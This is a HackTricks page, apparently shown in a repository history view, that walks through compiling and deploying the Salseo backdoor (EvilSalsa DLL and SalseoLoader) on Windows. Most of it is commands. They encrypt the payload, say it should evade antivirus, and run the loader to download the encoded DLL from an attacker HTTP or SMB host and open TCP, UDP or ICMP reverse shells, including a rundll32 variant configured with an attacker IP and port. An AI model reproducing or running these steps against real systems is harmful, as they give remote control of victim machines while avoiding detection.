hacktricks/backdoors/salseo.md

207 lines
7.4 KiB
Markdown
Raw Normal View History

2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
2022-08-04 20:47:35 +00:00
## Compiling the binaries
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
2022-08-04 20:47:35 +00:00
(\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
2022-08-10 14:32:58 +00:00
![](<../.gitbook/assets/image (132).png>)
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
2022-08-23 21:40:13 +00:00
![](<../.gitbook/assets/image (1) (2) (1).png>)
2022-08-04 20:47:35 +00:00
## Prepare the Backdoor
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**:
2022-08-04 20:47:35 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.**
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
2022-08-04 20:47:35 +00:00
## **Execute the backdoor**
2022-08-04 20:47:35 +00:00
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
2022-08-04 20:47:35 +00:00
### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
2022-08-04 20:47:35 +00:00
### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
2022-04-05 22:24:52 +00:00
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
2022-08-04 20:47:35 +00:00
#### **Disable ICMP Replies:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2022-08-04 20:47:35 +00:00
#### Execute the client:
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
2022-08-04 20:47:35 +00:00
#### Inside the victim, lets execute the salseo thing:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
2022-08-04 20:47:35 +00:00
## Compiling SalseoLoader as DLL exporting main function
Open the SalseoLoader project using Visual Studio.
2022-08-04 20:47:35 +00:00
### Add before the main function: \[DllExport]
2022-08-21 22:53:18 +00:00
![](<../.gitbook/assets/image (2) (1) (1).png>)
2022-08-04 20:47:35 +00:00
### Install DllExport for this project
2022-08-04 20:47:35 +00:00
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
2022-08-21 22:53:18 +00:00
![](<../.gitbook/assets/image (3) (1) (1).png>)
2022-08-04 20:47:35 +00:00
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
2022-08-23 21:40:13 +00:00
![](<../.gitbook/assets/image (4) (1) (1).png>)
2021-11-30 16:46:07 +00:00
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
2022-08-04 20:47:35 +00:00
### **U**ninstall DllExport
2021-11-30 16:46:07 +00:00
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
2022-08-23 21:40:13 +00:00
![](<../.gitbook/assets/image (5) (1).png>)
2022-08-04 20:47:35 +00:00
### **Exit Visual Studio and execute DllExport\_configure**
Just **exit** Visual Studio
2021-11-30 16:46:07 +00:00
Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**
2021-11-30 16:46:07 +00:00
Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
2022-08-13 23:06:40 +00:00
![](<../.gitbook/assets/image (7).png>)
2022-08-04 20:47:35 +00:00
### **Open the project again with visual Studio**
2021-11-30 16:46:07 +00:00
**\[DllExport]** should not be longer marked as error
2022-08-13 23:06:40 +00:00
![](<../.gitbook/assets/image (8).png>)
2022-08-04 20:47:35 +00:00
### Build the solution
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
![](<../.gitbook/assets/image (10).png>)
Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
![](<../.gitbook/assets/image (9).png>)
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
2022-08-04 20:47:35 +00:00
### Test the generated Dll
Copy and paste the Dll where you want to test it.
Execute:
```
rundll32.exe SalseoLoader.dll,main
```
If no error appears, probably you have a functional DLL!!
2022-08-04 20:47:35 +00:00
## Get a shell using the DLL
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
2022-08-04 20:47:35 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2022-08-04 20:47:35 +00:00
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>